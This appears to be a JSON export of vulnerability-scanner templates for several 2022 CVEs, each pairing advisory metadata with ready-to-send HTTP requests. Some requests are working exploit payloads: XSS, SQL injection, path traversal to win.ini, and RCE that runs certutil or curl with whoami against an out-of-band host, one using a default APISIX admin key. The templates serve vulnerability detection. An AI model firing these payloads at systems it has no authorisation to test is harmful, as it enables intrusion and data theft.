application/json\n\n - type: regex\n regex:\n - 'response_code\":200'\n - '\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b940545db7a1a8e51cb87f781d4b9f7ff7bdb733dc9e3e9655204af3837f5bba02200e130cc811f3149c5dadcd9d423811fc7ad8ca0528144218ddec9b6af10fc4af:922c64590222798bb761d5b6d8e72950", "hash": "e391e89a6c2f96d2fd708571124648b6", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ab" }, "name": "CVE-2022-2376.yaml", "content": "id: CVE-2022-2376\n\ninfo:\n name: WordPress Directorist <7.3.1 - Information Disclosure\n author: Random-Robbie\n severity: medium\n description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.\n impact: |\n An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks.\n remediation: Fixed in version 7.3.1.\n reference:\n - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2376\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-2376\n cwe-id: CWE-862\n epss-score: 0.04177\n epss-percentile: 0.92016\n cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpwax\n product: directorist\n framework: wordpress\n tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'directorist-authors__card__details__top'\n - 'directorist-authors__card__info-list'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cb70d03524416c4cc1af8cff5314a511b64abcf5e9026d7dbdb016fba5ddeda0022021c8dcef9f3fad8ea0d0eb19aa59daf7ce4f6d281296bc4b869f297db54aab20:922c64590222798bb761d5b6d8e72950", "hash": "5fd581985c6bc12eb66e83024c7432fc", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ac" }, "name": "CVE-2022-23779.yaml", "content": "id: CVE-2022-23779\n\ninfo:\n name: Zoho ManageEngine - Internal Hostname Disclosure\n author: cckuailong\n severity: medium\n description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.\n impact: |\n An attacker could use the disclosed internal hostnames to plan targeted attacks, gain unauthorized access, or perform reconnaissance on the internal network.\n remediation: |\n Apply the latest security patch or update provided by Zoho ManageEngine to fix the internal hostname disclosure vulnerability.\n reference:\n - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html\n - https://github.com/fbusr/CVE-2022-23779\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23779\n - https://github.com/soosmile/POC\n - https://github.com/zecool/cve\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-23779\n cwe-id: CWE-200\n epss-score: 0.00667\n epss-percentile: 0.79289\n cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: manageengine_desktop_central\n fofa-query: 
app=\"ZOHO-ManageEngine-Desktop\"\n tags: cve,cve2022,zoho,exposure,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/themes\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - '/themes/'\n - 'text/html'\n condition: and\n\n - type: word\n part: location\n negative: true\n words:\n - '{{Host}}'\n\n - type: word\n words:\n - '

    301 Moved Permanently

    '\n\n - type: regex\n part: location\n regex:\n - 'https?:\\/\\/(.*):'\n\n - type: status\n status:\n - 301\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 'https?:\\/\\/(.*):'\n part: location\n# digest: 4a0a00473045022100be0284c71a40a96363c13ed13bf8c275727ab6175539a57eafe9a886c8cf0d980220272096f146cc3ae542df232fbe589aa11cad6fcbfdfb8adaa4154e97c8588ff1:922c64590222798bb761d5b6d8e72950", "hash": "d3041d2668d6372fb1ac189644770b2b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ad" }, "name": "CVE-2022-2379.yaml", "content": "id: CVE-2022-2379\n\ninfo:\n name: WordPress Easy Student Results <=2.2.8 - Improper Authorization\n author: theamanrawat\n severity: high\n description: |\n WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number.\n impact: |\n An attacker can gain access to sensitive student information, potentially compromising their privacy and security.\n remediation: |\n Update to the latest version of the WordPress Easy Student Results plugin (2.2.8) to fix the improper authorization vulnerability.\n reference:\n - https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6\n - https://wordpress.org/plugins/easy-student-results/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2379\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-2379\n cwe-id: CWE-862\n epss-score: 0.01934\n epss-percentile: 0.87376\n cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: easy_student_results_project\n product: easy_student_results\n framework: wordpress\n tags: 
cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project\n\nhttp:\n - raw:\n - |\n GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\n Host: {{Hostname}}\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - '\"departments\":'\n - 'batches\":'\n condition: and\n\n - type: word\n part: body_2\n words:\n - 'meta_data'\n - '\"name\":\"'\n - '\"registration_no\":'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e1f2b124c765614d3ab35ff74edf5bbb68b70131be4b3b60a91c089395bc21a802200331ef6a4224f062eb1af5715667a63cb2fbc4407cd604a4a3dc649f383eef79:922c64590222798bb761d5b6d8e72950", "hash": "608652885c9681d92ceaf543696bd1fc", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ae" }, "name": "CVE-2022-23808.yaml", "content": "id: CVE-2022-23808\n\ninfo:\n name: phpMyAdmin < 5.1.2 - Cross-Site Scripting\n author: cckuailong,daffainfo\n severity: medium\n description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability.\n reference:\n - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A\n - https://github.com/dipakpanchal456/CVE-2022-23808\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23808\n - https://www.phpmyadmin.net/security/PMASA-2022-2/\n - 
https://infosecwriteups.com/exploit-cve-2022-23808-85041c6e5b97\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-23808\n cwe-id: CWE-79\n epss-score: 0.00743\n epss-percentile: 0.78912\n cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpmyadmin\n product: phpmyadmin\n shodan-query: http.component:\"phpmyadmin\"\n tags: cve,cve2022,phpmyadmin,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n - \"{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\\\">\"\n - \"

    Add a new server

    \"\n - \"phpMyAdmin setup\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022038d5ba39a2b759095a3f8426c738ce15cf6c83b54e32b080e617ac13d733503a022100e570ecb30aa4d1b1fe02f8867294888554e1bb76b68135ab78cb7e93cf859e4e:922c64590222798bb761d5b6d8e72950", "hash": "80fbe55c38d3a4fd841170de65d420f2", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084af" }, "name": "CVE-2022-2383.yaml", "content": "id: CVE-2022-2383\n\ninfo:\n name: WordPress Feed Them Social <3.0.1 - Cross-Site Scripting\n author: akincibor\n severity: medium\n description: |\n WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531\n - https://wordpress.org/plugins/feed-them-social/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2383\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2383\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45893\n cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: slickremix\n product: feed_them_social\n framework: wordpress\n tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n 
matchers:\n - type: word\n internal: true\n words:\n - 'Feed Them Social'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<img src onerror=alert(document.domain)><br/>'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022007c261c3ec560f291c2c68c92b556242e52fb67a3f9daa340a1f02f9b9b3091802204fccfa62735961d779929f897049f006dae4f29bcf27a5e66c59bc53889f2607:922c64590222798bb761d5b6d8e72950", "hash": "752b10c80a71339fc86260801aa12265", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b0" }, "name": "CVE-2022-23854.yaml", "content": "id: CVE-2022-23854\n\ninfo:\n name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion\n author: For3stCo1d\n severity: high\n description: |\n AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.\n impact: |\n An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability.\n reference:\n - https://packetstormsecurity.com/files/cve/CVE-2022-23854\n - https://www.aveva.com\n - https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854\n - https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-23854\n cwe-id: CWE-22,CWE-23\n epss-score: 0.66314\n epss-percentile: 0.97841\n cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:*\n metadata:\n 
verified: true\n max-request: 1\n vendor: aveva\n product: intouch_access_anywhere\n shodan-query: http.html:\"InTouch Access Anywhere\"\n tags: cve,cve2022,lfi,packetstorm,aveva,intouch\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'for 16-bit app support'\n - 'extensions'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/ini'\n - 'application/octet-stream'\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203ba9de7758c76694c9619b5b90dc1c5aad849e1e881d89f2fcb805ccd73226cf0220771816d83704155d2db5ac2473fcafb8e0175c8d3897d0457d88af07cbf5500e:922c64590222798bb761d5b6d8e72950", "hash": "82dfec65b7c11faec5d582db1fddbf2e", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b1" }, "name": "CVE-2022-23881.yaml", "content": "id: CVE-2022-23881\n\ninfo:\n name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp.\n reference:\n - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md\n - http://www.zzzcms.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23881\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-23881\n cwe-id: CWE-77\n 
epss-score: 0.16723\n epss-percentile: 0.95904\n cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zzzcms\n product: zzzphp\n tags: cve,cve2022,rce,zzzphp,zzzcms\n\nhttp:\n - raw:\n - |\n GET /?location=search HTTP/1.1\n Host: {{Hostname}}\n Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 490a0046304402206e4532e227dccab23d15511e741d5332c04c553aec092af6b3f824278ebd18c9022064325bd4ae46cc3b31537d917d6159428ee7cfe953375bb53aac8c2024b8ae2d:922c64590222798bb761d5b6d8e72950", "hash": "9157bbcba92bf957f3936be3c6f0b4ea", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b2" }, "name": "CVE-2022-23898.yaml", "content": "id: CVE-2022-23898\n\ninfo:\n name: MCMS 5.2.5 - SQL Injection\n author: Co5mos\n severity: critical\n description: |\n MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. 
An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5.\n reference:\n - https://github.com/ming-soft/MCMS/issues/62\n - https://github.com/advisories/GHSA-p94q-9q2m-pfh2\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23898\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-23898\n cwe-id: CWE-89\n epss-score: 0.0161\n epss-percentile: 0.87161\n cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: mingsoft\n product: mcms\n shodan-query: http.favicon.hash:1464851260\n fofa-query: icon_hash=\"1464851260\"\n tags: cve,cve2022,sqli,mcms,mingsoft\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /cms/content/list HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n categoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n\n matchers:\n - type: word\n part: body\n words:\n - 'c8c605999f3d8352d7bb792cf3fdb25'\n# digest: 4b0a00483046022100bc573519d97c7e33cb54d6edce45a40fcdb95812ec7800e929a9205d5685fc690221008936ca5aa6d12794cfd449ed310894bcd2cc70e038d631c3e29d6f0157b4b92e:922c64590222798bb761d5b6d8e72950", "hash": "9153d9b9efee6771798a5cc9bbe5a40b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b3" }, "name": "CVE-2022-23944.yaml", "content": "id: CVE-2022-23944\n\ninfo:\n name: Apache ShenYu Admin Unauth Access\n author: cckuakilong\n severity: critical\n description: Apache ShenYu suffers from an unauthorized 
access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel.\n remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.\n reference:\n - https://github.com/apache/incubator-shenyu/pull/2462\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23944\n - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md\n - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y\n - http://www.openwall.com/lists/oss-security/2022/01/25/15\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2022-23944\n cwe-id: CWE-306,CWE-862\n epss-score: 0.45887\n epss-percentile: 0.97086\n cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: shenyu\n tags: cve,cve2022,shenyu,unauth,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugin\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"message\":\"query success\"'\n - '\"code\":200'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207d4b54505896da78a61426b82a09c16b3004ec88eaafb319e9154fc6619cf00b0220133dc543f97181df2601ebbfe17254135ff340b3160efb33fad2e75fc4b49dc7:922c64590222798bb761d5b6d8e72950", "hash": "9e8e3b0ec8d6de37f1a45d22c62ce61e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b4" }, "name": "CVE-2022-24112.yaml", "content": "id: CVE-2022-24112\n\ninfo:\n name: Apache APISIX - Remote Code Execution\n author: Mr-xn\n severity: critical\n description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. 
An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).\n reference:\n - https://www.openwall.com/lists/oss-security/2022/02/11/3\n - https://twitter.com/sirifu4k1/status/1496043663704858625\n - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24112\n - http://www.openwall.com/lists/oss-security/2022/02/11/3\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-24112\n cwe-id: CWE-290\n epss-score: 0.97261\n epss-percentile: 0.99825\n cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: apisix\n shodan-query: title:\"Apache APISIX Dashboard\"\n fofa-query: title=\"Apache APISIX Dashboard\"\n tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive\n\nhttp:\n - raw:\n - |\n POST /apisix/batch-requests HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n Accept-Encoding: gzip, deflate\n Accept-Language: zh-CN,zh;q=0.9\n\n {\n \"headers\":{\n \"X-Real-IP\":\"127.0.0.1\",\n \"Content-Type\":\"application/json\"\n },\n \"timeout\":1500,\n \"pipeline\":[\n {\n \"method\":\"PUT\",\n 
\"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n }\n ]\n }\n - |\n GET /api/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept-Language: zh-CN,zh;q=0.9\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - '\"reason\":\"OK\"'\n - '\"status\":200'\n condition: and\n\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - GET \\/([a-z-]+) HTTP\n part: interactsh_request\n# digest: 4b0a004830460221008ec50579ecb1d58ca336d07a17961f227be3a77e752f3700fee6696537ecfaa7022100bbacb0066289e35e4ed902e5b09dfe5935e1cf61edc477f729c80d7926a6117a:922c64590222798bb761d5b6d8e72950", "hash": "b6479d346a2f34739f42085835575503", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b5" }, "name": "CVE-2022-24124.yaml", "content": "id: CVE-2022-24124\n\ninfo:\n name: Casdoor 1.13.0 - Unauthenticated SQL Injection\n author: cckuailong\n severity: high\n description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n remediation: |\n Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability.\n reference:\n - 
https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html\n - https://www.exploit-db.com/exploits/50792\n - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24124\n - https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24124\n cwe-id: CWE-89\n epss-score: 0.07543\n epss-percentile: 0.93981\n cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: casbin\n product: \"casdoor\"\n shodan-query: http.title:\"Casdoor\"\n tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"XPATH syntax error.*'\"\n - \"casdoor\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ba5ebd65a068d08aa8a9fb4c512f59baa665b2cbe8fa4e25a66a92104f27f415022100d66fba2ed1e2304f9c437470604cb22840501aada5cd30a98bf5d9811b2b07e4:922c64590222798bb761d5b6d8e72950", "hash": "f7eb83771c4dd5eae7c64378c1820ca7", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b6" }, "name": "CVE-2022-24129.yaml", "content": "id: CVE-2022-24129\n\ninfo:\n name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery\n author: 0x_Akoko\n severity: high\n description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.\n impact: |\n An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or 
information disclosure.\n remediation: |\n Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability.\n reference:\n - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF\n - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP\n - http://shibboleth.net/community/advisories/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24129\n - http://shibboleth.net/community/advisories/secadv_20220131.txt\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N\n cvss-score: 8.2\n cve-id: CVE-2022-24129\n cwe-id: CWE-918\n epss-score: 0.00647\n epss-percentile: 0.77074\n cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:*\n metadata:\n max-request: 1\n vendor: shibboleth\n product: oidc_op\n framework: identity_provider\n tags: cve,cve2022,ssrf,oidc,shibboleth,identity_provider\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"ShibbolethIdp\"\n# digest: 4a0a004730450221008f7628cf3482df6bb5f6dc923c39a4fd651c4428bbb09c0f117f6b32b15940e402206af2dfa7231ae6a440e9440cc05d63f828a884006f109b865c5046f61b0b8cb6:922c64590222798bb761d5b6d8e72950", "hash": "8242f7cd8cb512ecf1bc04dae21c852f", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084b7" }, "name": "CVE-2022-2414.yaml", "content": "id: CVE-2022-2414\n\ninfo:\n name: FreeIPA - XML Entity Injection\n author: DhiyaneshDk\n severity: high\n description: |\n Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. 
This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.\n remediation: |\n Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA.\n reference:\n - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2414\n - https://github.com/dogtagpki/pki/pull/4021\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-2414\n cwe-id: CWE-611\n epss-score: 0.01256\n epss-percentile: 0.84092\n cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: dogtagpki\n product: dogtagpki\n 